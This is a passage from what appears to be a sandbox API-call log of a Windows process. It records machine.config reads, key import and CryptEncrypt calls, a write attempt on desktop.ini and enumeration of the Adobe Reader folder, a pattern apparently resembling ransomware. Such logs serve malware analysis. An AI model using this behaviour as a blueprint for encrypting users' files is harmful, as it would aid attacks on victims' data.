lpFileInformation=0x8f6ee18 | out: lpFileInformation=0x8f6ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0135.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ed98) returned 1 [0135.904] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538 [0135.904] GetLastError () returned 0x0 [0135.904] SysReAllocStringLen (in: pbstr=0x8f6ea04*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x8f6ea04*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0135.904] GetThreadLocale () returned 0x409 [0135.904] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0135.904] GetThreadLocale () returned 0x409 [0135.904] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0135.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x8f6e788, lpFilePart=0x8f6e784 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x8f6e784*="machine.config") returned 0x43 [0135.905] SysReAllocStringLen (in: pbstr=0x8f6ea04*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x8f6ea04*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0135.905] SysReAllocStringLen (in: pbstr=0x8f6e9b4*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x8f6e9b4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0135.905] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0135.905] SysReAllocStringLen (in: pbstr=0x8f6ea04*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x8f6ea04*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0135.905] SetLastError (dwErrCode=0x0) [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] GetCurrentThreadId () returned 0x6fc [0136.991] SetEvent (hEvent=0xbc) returned 1 [0136.991] ReadFile (in: hFile=0x538, lpBuffer=0xb87cf0, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x8f6ea14, lpOverlapped=0x0 | out: lpBuffer=0xb87cf0*, lpNumberOfBytesRead=0x8f6ea14*=0xfff, lpOverlapped=0x0) returned 1 [0137.190] GetCurrentThreadId () returned 0x6fc [0137.190] GetCurrentThreadId () returned 0x6fc [0137.190] GetCurrentThreadId () returned 0x6fc [0137.190] GetCurrentThreadId () returned 0x6fc [0137.190] GetCurrentThreadId () returned 0x6fc [0137.191] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.191] GetCurrentThreadId () returned 0x6fc [0137.191] GetCurrentThreadId () returned 0x6fc [0137.191] GetCurrentThreadId () returned 0x6fc [0137.191] SetEvent (hEvent=0xbc) returned 1 [0137.191] ReadFile (in: hFile=0x538, lpBuffer=0x66a4050, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x8f6e9fc, lpOverlapped=0x0 | out: lpBuffer=0x66a4050*, lpNumberOfBytesRead=0x8f6e9fc*=0x17f7, lpOverlapped=0x0) returned 1 [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] GetCurrentThreadId () returned 0x6fc [0137.198] SetEvent (hEvent=0xbc) returned 1 [0137.198] ReadFile (in: hFile=0x538, lpBuffer=0x66a4050, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x8f6ea0c, lpOverlapped=0x0 | out: lpBuffer=0x66a4050*, lpNumberOfBytesRead=0x8f6ea0c*=0x1001, lpOverlapped=0x0) returned 1 [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] GetCurrentThreadId () returned 0x6fc [0137.202] GetCurrentThreadId () returned 0x6fc [0137.203] SetEvent (hEvent=0xbc) returned 1 [0137.203] ReadFile (in: hFile=0x538, lpBuffer=0x66a4050, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x8f6ea0c, lpOverlapped=0x0 | out: lpBuffer=0x66a4050*, lpNumberOfBytesRead=0x8f6ea0c*=0x1002, lpOverlapped=0x0) returned 1 [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] GetCurrentThreadId () returned 0x6fc [0137.211] SetEvent (hEvent=0xbc) returned 1 [0137.211] ReadFile (in: hFile=0x538, lpBuffer=0x66a5850, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x8f6ea00, lpOverlapped=0x0 | out: lpBuffer=0x66a5850*, lpNumberOfBytesRead=0x8f6ea00*=0x1f28, lpOverlapped=0x0) returned 1 [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] GetCurrentThreadId () returned 0x6fc [0137.221] SetEvent (hEvent=0xbc) returned 1 [0137.221] ReadFile (in: hFile=0x538, lpBuffer=0x66a5850, nNumberOfBytesToRead=0x10a7, lpNumberOfBytesRead=0x8f6ea0c, lpOverlapped=0x0 | out: lpBuffer=0x66a5850*, lpNumberOfBytesRead=0x8f6ea0c*=0x10a7, lpOverlapped=0x0) returned 1 [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] GetCurrentThreadId () returned 0x6fc [0137.226] SetEvent (hEvent=0xbc) returned 1 [0137.226] ReadFile (in: hFile=0x538, lpBuffer=0x66a5850, nNumberOfBytesToRead=0x1019, lpNumberOfBytesRead=0x8f6ea0c, lpOverlapped=0x0 | out: lpBuffer=0x66a5850*, lpNumberOfBytesRead=0x8f6ea0c*=0x1019, lpOverlapped=0x0) returned 1 [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] GetCurrentThreadId () returned 0x6fc [0137.231] GetCurrentThreadId () returned 0x6fc [0137.232] SetEvent (hEvent=0xbc) returned 1 [0137.232] ReadFile (in: hFile=0x538, lpBuffer=0x66a5850, nNumberOfBytesToRead=0x109d, lpNumberOfBytesRead=0x8f6ea00, lpOverlapped=0x0 | out: lpBuffer=0x66a5850*, lpNumberOfBytesRead=0x8f6ea00*=0x4ae, lpOverlapped=0x0) returned 1 [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] GetCurrentThreadId () returned 0x6fc [0137.234] SetEvent (hEvent=0xbc) returned 1 [0137.234] ReadFile (in: hFile=0x538, lpBuffer=0x66a7780, nNumberOfBytesToRead=0x1feb, lpNumberOfBytesRead=0x8f6ea00, lpOverlapped=0x0 | out: lpBuffer=0x66a7780*, lpNumberOfBytesRead=0x8f6ea00*=0x0, lpOverlapped=0x0) returned 1 [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] ResetEvent (hEvent=0xb8) returned 1 [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] ResetEvent (hEvent=0xb8) returned 1 [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] GetCurrentThreadId () returned 0x6fc [0137.235] SetEvent (hEvent=0xbc) returned 1 [0137.235] SetEvent (hEvent=0xb8) returned 1 [0137.236] CloseHandle (hObject=0x538) returned 1 [0137.688] CryptGenRandom (in: hProv=0xb1e9d8, dwLen=0x10, pbBuffer=0x37a5b18 | out: pbBuffer=0x37a5b18) returned 1 [0141.552] CryptImportKey (in: hProv=0xb1e9d8, pbData=0x377ce90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6eeec | out: phKey=0x8f6eeec*=0xb7f690) returned 1 [0141.552] CryptContextAddRef (hProv=0xb1e9d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.552] CryptContextAddRef (hProv=0xb1e9d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.552] CryptDuplicateKey (in: hKey=0xb7f690, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6eedc | out: phKey=0x8f6eedc*=0xb7f6d0) returned 1 [0141.552] CryptContextAddRef (hProv=0xb1e9d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.553] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x377cf70*=0x1, dwFlags=0x0) returned 1 [0141.553] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x1, pbData=0x377cf3c, dwFlags=0x0) returned 1 [0141.553] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x377cf80*, pdwDataLen=0x8f6ef48*=0xb0, dwBufLen=0xb0 | out: pbData=0x377cf80*, pdwDataLen=0x8f6ef48*=0xb0) returned 1 [0141.553] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x377d054*, pdwDataLen=0x8f6ef50*=0x0, dwBufLen=0x10 | out: pbData=0x377d054*, pdwDataLen=0x8f6ef50*=0x10) returned 1 [0141.554] CryptDestroyKey (hKey=0xb7f690) returned 1 [0141.554] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0141.554] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0141.554] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x8f6e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0141.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eeb4) returned 1 [0141.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0141.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6dcf0) returned 1 [0141.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6f01c) returned 1 [0141.556] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe", nBufferLength=0x105, lpBuffer=0x8f6eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe", lpFilePart=0x0) returned 0x1c [0141.556] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\", nBufferLength=0x105, lpBuffer=0x8f6eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\", lpFilePart=0x0) returned 0x1d [0141.556] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x8f6ed44 | out: lpFindFileData=0x8f6ed44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf40b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf40b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f690 [0141.557] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed54 | out: lpFindFileData=0x8f6ed54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf40b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf40b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.557] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed54 | out: lpFindFileData=0x8f6ed54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0141.557] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed54 | out: lpFindFileData=0x8f6ed54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 0 [0141.557] FindClose (in: hFindFile=0xb7f690 | out: hFindFile=0xb7f690) returned 1 [0141.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6efdc) returned 1 [0141.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6efe8) returned 1 [0141.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6f01c) returned 1 [0141.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe", nBufferLength=0x105, lpBuffer=0x8f6eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe", lpFilePart=0x0) returned 0x1c [0141.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\", nBufferLength=0x105, lpBuffer=0x8f6eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\", lpFilePart=0x0) returned 0x1d [0141.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x8f6ed44 | out: lpFindFileData=0x8f6ed44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf40b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf40b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f690 [0141.558] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed54 | out: lpFindFileData=0x8f6ed54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf40b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf40b40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.558] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed54 | out: lpFindFileData=0x8f6ed54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0141.558] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed54 | out: lpFindFileData=0x8f6ed54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0141.558] FindClose (in: hFindFile=0xb7f690 | out: hFindFile=0xb7f690) returned 1 [0141.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6efdc) returned 1 [0141.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6efe8) returned 1 [0141.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6efcc) returned 1 [0141.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0", nBufferLength=0x105, lpBuffer=0x8f6ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0", lpFilePart=0x0) returned 0x28 [0141.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", nBufferLength=0x105, lpBuffer=0x8f6eaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpFilePart=0x0) returned 0x29 [0141.559] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x8f6ecf4 | out: lpFindFileData=0x8f6ecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f690 [0141.559] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.559] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0x0, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0141.559] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0141.559] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0141.559] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0x0, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0141.560] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, 